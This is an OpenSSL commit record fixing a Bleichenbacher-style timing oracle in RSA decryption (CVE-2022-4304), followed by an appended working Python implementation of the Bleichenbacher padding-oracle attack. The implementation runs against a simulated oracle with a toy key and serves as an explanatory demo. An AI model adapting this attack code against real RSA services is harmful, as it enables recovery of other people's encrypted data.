Fix Timing Oracle in RSA decryption
author    Dmitry Belyavskiy <beldmit@gmail.com>
          Fri, 20 Jan 2023 15:03:40 +0000 (15:03 +0000)
committer Tomas Mraz <tomas@openssl.org>
          Fri, 3 Feb 2023 11:38:22 +0000 (12:38 +0100)
commit    8e257b86e5812c6e1cfa9e8e5f5660ac7bed899d
tree      24b77097378730b287a820584800bc292d4061b8
parent    fe6842f5a5dc2fb66da7fb24bf4343a3aeedd50a

A timing based side channel exists in the OpenSSL RSA Decryption
implementation which could be sufficient to recover a plaintext across
a network in a Bleichenbacher style attack. To achieve a successful
decryption an attacker would have to be able to send a very large number
of trial messages for decryption. The vulnerability affects all RSA
padding modes: PKCS#1 v1.5, RSA-OAEP and RSASVE.

Patch written by Dmitry Belyavsky and Hubert Kario

CVE-2022-4304

Reviewed-by: Matt Caswell <matt@openssl.org>
Reviewed-by: Tomas Mraz <tomas@openssl.org>
crypto/bn/bn_blind.c
crypto/bn/bn_local.h
crypto/bn/build.info
crypto/bn/rsa_sup_mul.c [new file with mode: 0644]
crypto/rsa/rsa_ossl.c
include/crypto/bn.h
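The Bleichenbacher-style attack the commit message refers to, as an added example that is not OpenSSL code and not part of this patch: the attacker holds a ciphertext and a yes/no oracle for "was the decrypted block PKCS#1 v1.5 conforming?", and recovers the plaintext by submitting a large number of adaptively chosen trial ciphertexts. Here the oracle is modelled as a direct check of the first two padding bytes, standing in for the timing signal a real attacker would have to measure; the key size (128-bit, deliberately toy), the function and class names (`keygen`, `PaddingOracle`, `bleichenbacher`, `demo`) and the sample message are my own choices.

```python
"""Bleichenbacher-style attack on a PKCS#1 v1.5 padding oracle, at toy key size."""
import random
from math import gcd

RNG = random.Random(20230120)  # seeded so the run is reproducible


def is_probable_prime(n, rounds=32):
    """Miller-Rabin; good enough for a demo key."""
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(RNG.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def keygen(bits=128, e=65537):
    """Toy RSA key (128-bit!), sized so the attack finishes in seconds."""
    def prime(b):
        while True:
            cand = RNG.getrandbits(b) | (1 << (b - 1)) | 1
            if is_probable_prime(cand):
                return cand
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi)


def pkcs1_v15_pad(msg, k):
    """EME-PKCS1-v1_5: 00 02 <nonzero PS, >= 8 bytes> 00 <msg>, as an integer."""
    ps = bytes(RNG.randrange(1, 256) for _ in range(k - len(msg) - 3))
    assert len(ps) >= 8
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")


class PaddingOracle:
    """Stand-in for the timing side channel: the attacker learns only whether
    the decrypted block starts with 00 02, and we count how often it asked."""
    def __init__(self, n, d):
        self.n, self.d, self.queries = n, d, 0

    def __call__(self, c):
        self.queries += 1
        k = (self.n.bit_length() + 7) // 8
        return pow(c, self.d, self.n).to_bytes(k, "big")[:2] == b"\x00\x02"


def ceil_div(a, b):
    return -(-a // b)


def bleichenbacher(oracle, n, e, c):
    """Recover m = c^d mod n using only the oracle (Bleichenbacher, CRYPTO '98)."""
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 2))                 # conforming m lie in [2B, 3B)
    intervals = [(2 * B, 3 * B - 1)]

    def conforming(s):                     # does m*s mod n still look padded?
        return oracle(c * pow(s, e, n) % n)

    s, first = ceil_div(n, 3 * B), True    # c itself conforms, so no blinding step
    while True:
        if first or len(intervals) > 1:    # steps 2.a / 2.b: linear search for s
            s += 0 if first else 1
            while not conforming(s):
                s += 1
            first = False
        else:                              # step 2.c: one interval left, narrow fast
            a, b = intervals[0]
            r, found = ceil_div(2 * (b * s - 2 * B), n), False
            while not found:
                lo, hi = ceil_div(2 * B + r * n, b), (3 * B - 1 + r * n) // a
                for cand in range(lo, hi + 1):
                    if conforming(cand):
                        s, found = cand, True
                        break
                r += 1
        new = set()                        # step 3: intersect with the new constraint
        for a, b in intervals:
            for r in range(ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                na, nb = max(a, ceil_div(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if na <= nb:
                    new.add((na, nb))
        intervals = []
        for a, b in sorted(new):           # merge overlapping intervals
            if intervals and a <= intervals[-1][1] + 1:
                intervals[-1] = (intervals[-1][0], max(intervals[-1][1], b))
            else:
                intervals.append((a, b))
        if len(intervals) == 1 and intervals[0][0] == intervals[0][1]:
            return intervals[0][0]         # step 4: the interval collapsed to m


def unpad(m, k):
    block = m.to_bytes(k, "big")
    return block[block.index(b"\x00", 2) + 1:]


def demo(msg=b"hi"):
    """Encrypt msg, then recover it through the oracle alone; returns (plaintext, query count)."""
    n, e, d = keygen()
    k = (n.bit_length() + 7) // 8
    c = pow(pkcs1_v15_pad(msg, k), e, n)
    oracle = PaddingOracle(n, d)
    return unpad(bleichenbacher(oracle, n, e, c), k), oracle.queries


if __name__ == "__main__":
    plaintext, queries = demo(b"hi")
    print(f"recovered {plaintext!r} after {queries} oracle queries")
```

The oracle here answers on the first two bytes only (the weakest, fastest-converging variant); a timing oracle against a real implementation is noisier and needs many repeated measurements per trial ciphertext, which is why the message speaks of a very large number of trial decryptions. Note that the query count is typically in the tens of thousands even at this key size: the attack's cost depends on the padding structure, not on the modulus length, so a 2048-bit key offers no extra protection once such an oracle exists.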